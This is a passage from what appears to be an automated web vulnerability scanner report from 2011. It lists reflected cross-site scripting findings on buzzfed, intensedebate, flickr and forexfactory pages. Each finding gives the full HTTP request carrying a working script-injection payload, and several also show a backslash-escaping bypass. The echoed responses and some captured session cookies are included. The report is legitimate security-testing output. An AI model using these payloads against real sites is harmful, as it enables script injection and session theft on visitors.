This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /63975/17983acd3149cc7b59eebf3385392137?callback=BF_PARTNER.gate_response925bf<script>alert(1)</script>2fdbf40cf8d&cb=8678 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Tue, 21 Jun 2011 00:16:54 GMT
Date: Tue, 14 Jun 2011 00:16:54 GMT
Connection: close

BF_PARTNER.gate_response925bf<script>alert(1)</script>2fdbf40cf8d(1280325136);
3.29. http://s.intensedebate.com/css/sys.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /css/sys.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ae139'><script>alert(1)</script>bafed2ed83c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/sys.cssae139'><script>alert(1)</script>bafed2ed83c?q=57 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Jun 2011 00:32:53 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4707

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/css/sys.cssae139'><script>alert(1)</script>bafed2ed83c?q=57'>
...[SNIP]...
3.30. http://s.intensedebate.com/images/automattic.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/automattic.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1f737'><script>alert(1)</script>5e66b7822e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/automattic.png1f737'><script>alert(1)</script>5e66b7822e6?25 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Jun 2011 00:33:37 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4714

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/automattic.png1f737'><script>alert(1)</script>5e66b7822e6?25'>
...[SNIP]...
3.31. http://s.intensedebate.com/images/home-sites-sprite.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/home-sites-sprite.jpg

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4388a'><script>alert(1)</script>3c963389289 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/home-sites-sprite.jpg4388a'><script>alert(1)</script>3c963389289?=1 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Jun 2011 00:33:35 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4725

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/home-sites-sprite.jpg4388a'><script>alert(1)</script>3c963389289?=1'>
...[SNIP]...
3.32. http://s.intensedebate.com/images/home-sprite.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/home-sprite.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bd235'><script>alert(1)</script>f9a69b4d5e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/home-sprite.pngbd235'><script>alert(1)</script>f9a69b4d5e8?=2 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Jun 2011 00:33:37 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4717

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/home-sprite.pngbd235'><script>alert(1)</script>f9a69b4d5e8?=2'>
...[SNIP]...
3.33. http://s.intensedebate.com/images/sprite.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /images/sprite.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 158c7'><script>alert(1)</script>4f5547cba37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/sprite.png158c7'><script>alert(1)</script>4f5547cba37?=4 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Jun 2011 00:33:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4714

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/images/sprite.png158c7'><script>alert(1)</script>4f5547cba37?=4'>
...[SNIP]...
3.34. http://s.intensedebate.com/js/idm-combined.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.intensedebate.com
Path:   /js/idm-combined.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 77480'><script>alert(1)</script>bc81ff4a3c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/idm-combined.js77480'><script>alert(1)</script>bc81ff4a3c8?v=1 HTTP/1.1
Host: s.intensedebate.com
Proxy-Connection: keep-alive
Referer: http://intensedebate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=239309019.1307475308.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; __utma=239309019.1191985641.1307475308.1307475308.1307475308.1; __qca=P0-470302247-1307475307888

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Tue, 14 Jun 2011 00:33:16 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Server: nginx
Vary: Accept-Encoding
Content-Length: 4717

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="Conte
...[SNIP]...
<script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/idm-combined.js77480'><script>alert(1)</script>bc81ff4a3c8?v=1'>
...[SNIP]...
3.35. http://www.flickr.com/apps/badge/badge_iframe.gne [zg_bg_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /apps/badge/badge_iframe.gne

Issue detail

The value of the zg_bg_color request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 306cf'%3balert(1)//9384b172f5d was submitted in the zg_bg_color parameter. This input was echoed as 306cf';alert(1)//9384b172f5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/badge/badge_iframe.gne?zg_bg_color=ffffff306cf'%3balert(1)//9384b172f5d&zg_person_id=56984041%40N00 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/2011/05/31/yahoo-launches-clear-ad-notice/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:23 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Served-By: www146.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Via: HTTP/1.1 r11.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r13.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 3543


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/fpi.js.v62
...[SNIP]...
fined) ? 37 : zg_wh;


var zg_fw = zg_cols*zg_wh+((zg_cols-1)*1); // border of one
var zg_fh = zg_rows*zg_wh+((zg_rows-1)*1); // border of one

var zg_bg_color = 'ffffff';
zg_bg_color = 'ffffff306cf';alert(1)//9384b172f5d';
var zg_url = 'http://'+fl_host+'/apps/badge/flashbadge.swf?host=http://'+fl_host+'&bg_color='+zg_bg_color+'&cols='+zg_cols+'&rows='+zg_rows+'&wh='+zg_wh+'&swapInterv='+zg_swapInterv+'&loadInterv='+
...[SNIP]...
3.36. http://www.flickr.com/apps/badge/badge_iframe.gne [zg_person_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /apps/badge/badge_iframe.gne

Issue detail

The value of the zg_person_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43105'%3balert(1)//1a54a9cab45 was submitted in the zg_person_id parameter. This input was echoed as 43105';alert(1)//1a54a9cab45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apps/badge/badge_iframe.gne?zg_bg_color=ffffff&zg_person_id=56984041%40N0043105'%3balert(1)//1a54a9cab45 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/2011/05/31/yahoo-launches-clear-ad-notice/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:28 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Served-By: www100.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Via: HTTP/1.1 r07.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r16.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 3543


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/fpi.js.v62
...[SNIP]...
.indexOf("MSIE 6") > 0 || ua.indexOf("MSIE 7") > 0) {
            // IE 5.5+
       } else {
            if (ua.indexOf('Gecko') == -1) return false;
       }
}
return true;
}
       
var zg_nsid = '56984041@N0043105';alert(1)//1a54a9cab45';
var zg_scope = '0';
var zg_favorites = '0';
var zg_tags = '';
var zg_tag_mode = 'all';
var zg_group_id = '';
var zg_text = '';
var zg_set_id = '';
var zg_context = '';

var zg_swapInterv =
...[SNIP]...
3.37. http://www.forexfactory.com/excal.php [colors[2] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /excal.php

Issue detail

The value of the colors[2] request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b114\"%3balert(1)//a2b9ca92c9 was submitted in the colors[2] parameter. This input was echoed as 2b114\\";alert(1)//a2b9ca92c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /excal.php?do=fetch&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF&colors[6]=%23FFFFFF&colors[8]=%23000000cfe41\%22%3balert(document.location)//5fae3ef9ef8&colors[1]=%230B198C&colors[2]=%23d1d1e12b114\"%3balert(1)//a2b9ca92c9&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=8229.065318565583 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://burp/show/2
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fflastvisit=1308052908; ffsessionhash=1eda646f3ad4d2f8115b4662e9982e43; fflastactivity=0; __utmz=113005075.1308052959.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113005075.1431033565.1308052959.1308052959.1308052959.1; __utmc=113005075; __utmb=113005075.1.10.1308052959

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:28:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: fflastvisit=1308052908; expires=Wed, 13-Jun-2012 12:28:21 GMT; path=/; domain=.forexfactory.com
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:28:21 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: application/x-javascript; charset=windows-1252
Content-Length: 68250

var _sds_html = '';
_sds_html += "<form method=\"post\"action=\"index.php\" onsubmit=\"return ffSyndication_Calendar.calendar_filters(this, false);\" name=\"_cal_filters\">";
_sds_html += "<input ty
...[SNIP]...
<td class=\"dateHeading\" colspan=\"9\" style=\"border-bottom: 1px solid #d1d1e12b114\\";alert(1)//a2b9ca92c9;\" width=\"100%\">
...[SNIP]...
3.38. http://www.forexfactory.com/excal.php [colors[4] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /excal.php

Issue detail

The value of the colors[4] request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 927e6\"%3balert(1)//62c8519a6c1 was submitted in the colors[4] parameter. This input was echoed as 927e6\\";alert(1)//62c8519a6c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /excal.php?do=fetch&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF927e6\"%3balert(1)//62c8519a6c1&colors[6]=%23FFFFFF&colors[8]=%23000000cfe41\%22%3balert(document.location)//5fae3ef9ef8&colors[1]=%230B198C&colors[2]=%23d1d1e1&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=8229.065318565583 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://burp/show/2
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fflastvisit=1308052908; ffsessionhash=1eda646f3ad4d2f8115b4662e9982e43; fflastactivity=0; __utmz=113005075.1308052959.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113005075.1431033565.1308052959.1308052959.1308052959.1; __utmc=113005075; __utmb=113005075.1.10.1308052959

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:27:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: fflastvisit=1308052908; expires=Wed, 13-Jun-2012 12:27:59 GMT; path=/; domain=.forexfactory.com
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:27:59 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: application/x-javascript; charset=windows-1252
Content-Length: 68020

var _sds_html = '';
_sds_html += "<form method=\"post\"action=\"index.php\" onsubmit=\"return ffSyndication_Calendar.calendar_filters(this, false);\" name=\"_cal_filters\">";
_sds_html += "<input ty
...[SNIP]...
<a href=\"#\" style=\"white-space: nowrap; color: #FFFFFF927e6\\";alert(1)//62c8519a6c1;\">
...[SNIP]...
3.39. http://www.forexfactory.com/excal.php [colors[8] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /excal.php

Issue detail

The value of the colors[8] request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca0b3\"%3balert(1)//7fd3c255b13 was submitted in the colors[8] parameter. This input was echoed as ca0b3\\";alert(1)//7fd3c255b13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /excal.php?do=fetch&width=845&height=500&font=14&dark=0&colors[3]=%23869BBF%20url%28images/gradients/gradient_tcat.gif%29%20repeat-x&colors[5]=%235C7099%20url%28images/gradients/gradient_thead.gif%29%20repeat-x&colors[7]=%23F5F5FF&colors[4]=%23FFFFFF&colors[6]=%23FFFFFF&colors[8]=ca0b3\"%3balert(1)//7fd3c255b13&colors[1]=%230B198C&colors[2]=%23d1d1e1&width_type=px&height_type=px&timezone=-5&timeformat=0&timedst=1&nocache=8229.065318565583 HTTP/1.1
Host: www.forexfactory.com
Proxy-Connection: keep-alive
Referer: http://burp/show/2
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fflastvisit=1308052908; ffsessionhash=1eda646f3ad4d2f8115b4662e9982e43; fflastactivity=0; __utmz=113005075.1308052959.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113005075.1431033565.1308052959.1308052959.1308052959.1; __utmc=113005075; __utmb=113005075.1.10.1308052959

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:28:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: fflastvisit=1308052908; expires=Wed, 13-Jun-2012 12:28:10 GMT; path=/; domain=.forexfactory.com
Set-Cookie: fflastactivity=0; expires=Wed, 13-Jun-2012 12:28:10 GMT; path=/; domain=.forexfactory.com
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: application/x-javascript; charset=windows-1252
Content-Length: 67822

var _sds_html = '';
_sds_html += "<form method=\"post\"action=\"index.php\" onsubmit=\"return ffSyndication_Calendar.calendar_filters(this, false);\" name=\"_cal_filters\">";
_sds_html += "<input ty
...[SNIP]...
<tr class=\"eventRow\" id='timeoptions' style=\"display: none; color: ca0b3\\";alert(1)//7fd3c255b13;\">
...[SNIP]...
3.40. http://www.forexfactory.com/ws_cal.php [colors[2] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /ws_cal.php

Issue detail

The value of the colors[2] request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26b9b\"%3balert(1)//33ca1322ece was submitted in the colors[2] parameter. This input was echoed as 26b9b\\";alert(1)//33ca1322ece in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

